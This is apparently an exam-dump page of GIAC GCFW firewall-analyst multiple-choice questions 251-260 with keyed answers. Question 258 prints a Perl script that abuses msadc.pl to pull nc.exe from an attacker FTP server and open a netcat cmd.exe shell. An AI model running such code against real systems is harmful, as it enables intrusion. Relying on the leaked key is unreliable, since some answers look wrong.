[Free] 2017(Sep) EnsurePass Testinsides GIAC GCFW Dumps with VCE and PDF 251-260


GIAC Certified Firewall Analyst

Question No: 251 – (Topic 2)

Which of the following methods is a behavior-based IDS detection method?

  A. Protocol detection

  B. Knowledge-based detection

  C. Pattern matching detection

  D. Statistical anomaly detection

Answer: D

Question No: 252 – (Topic 2)

Which of the following statements is true about ICMP packets?

Each correct answer represents a complete solution. Choose all that apply.

  A. They are used to report errors if a problem in IP processing occurs.

  B. They use UDP datagrams.

  C. They guarantee the delivery of datagrams.

  D. The PING utility uses them to verify connectivity between two hosts.

  E. They are encapsulated within IP datagrams.

Answer: A,D,E

Question No: 253 – (Topic 2)

Which of the following describes the term inside global in NAT configuration?

  A. It is a local MAC address assigned to a host in a private network.

  B. It is the data that comes inside a local network from an external host.

  C. It is a local IP address assigned to a host in a private network.

  D. It is the registered (public) IP address that represents the inside hosts in a private network to the outside network.

Answer: D

Question No: 254 – (Topic 2)

You work as a technician for Tech Perfect Inc. You are troubleshooting an Internet name resolution issue. You ping your ISP's DNS server address and find that the server is down. You want to continuously ping the DNS address until you have stopped the command.

Which of the following commands will you use?

  A. ping -a

  B. ping -l

  C. ping -n

  D. ping -t

Answer: D

Question No: 255 – (Topic 2)

John works as the Security Manager in PassGuide Inc. He wants to protect his network from a variant of the Denial-of-Service (DoS) attack. When the rulebase is enabled for protection, the IDP engine checks the traffic that exceeds the traffic thresholds. Which of the following rulebases is used for this purpose?

  A. Exempt rulebase

  B. SYN Protector rulebase

  C. Traffic Anomalies rulebase

  D. Backdoor rulebase

Answer: B

Question No: 256 – (Topic 2)

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?

Each correct answer represents a complete solution. Choose all that apply.

  A. Whisker

  B. Fragroute

  C. Nessus

  D. Y.A.T.

Answer: A,C

Question No: 257 – (Topic 2)

Andrew works as a Forensic Investigator for PassGuide Inc. The company has a Windows-based environment. The company's employees use Microsoft Outlook Express as their e-mail client program. E-mails of some employees have been deleted due to a virus attack on the network.

Andrew is therefore assigned the task to recover the deleted mails. Which of the following tools can Andrew use to accomplish the task?

Each correct answer represents a complete solution. Choose two.

  A. FINALeMAIL

  B. R-mail

  C. EventCombMT

  D. eMailTrackerPro

Answer: A,B

Question No: 258 – (Topic 2)

Adam, a malicious hacker, performs an exploit, which is given below:

    #################################################################
    $port = 53;
    # Spawn cmd.exe on port X
    $your = "192.168.1.1"; # Your FTP Server 89
    $user = "Anonymous"; # login as
    $pass = 'noone@nowhere.com'; # password
    #################################################################
    $host = $ARGV[0];
    print "Starting …\n";
    print "Server will download the file nc.exe from $your FTP server.\n";
    system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
    system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
    print "Server is downloading …\n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
    print "Press ENTER when download is finished … (Have a ftp server)\n";
    $o=<STDIN>;
    print "Opening …\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
    print "Done.\n";
    #system("telnet $host $port");
    exit(0);

Which of the following is the expected result of the above exploit?

  A. Creates a share called "sasfile" on the target system

  B. Opens up a telnet listener that requires no username or password

  C. Opens up a SMTP server that requires no username or password

  D. Creates an FTP server with write permissions enabled

Answer: B

Question No: 259 – (Topic 2)

Which of the following responsibilities does not come under the audit process?

Each correct answer represents a complete solution. Choose all that apply.

  A. Reporting all facts and circumstances of the irregular and illegal acts.

  B. Reviewing the results of the audit procedures.

  C. Planning the IT audit engagement based on the assessed level of risk.

  D. Applying security policies.

Answer: A,B,C

Question No: 260 – (Topic 2)

Your customer is concerned about security. He wants to make certain no one in the outside world can see the IP addresses inside his network. What feature of a router would accomplish this?

  A. NAT

  B. Firewall

  C. Port forwarding

  D. MAC filtering

Answer: A
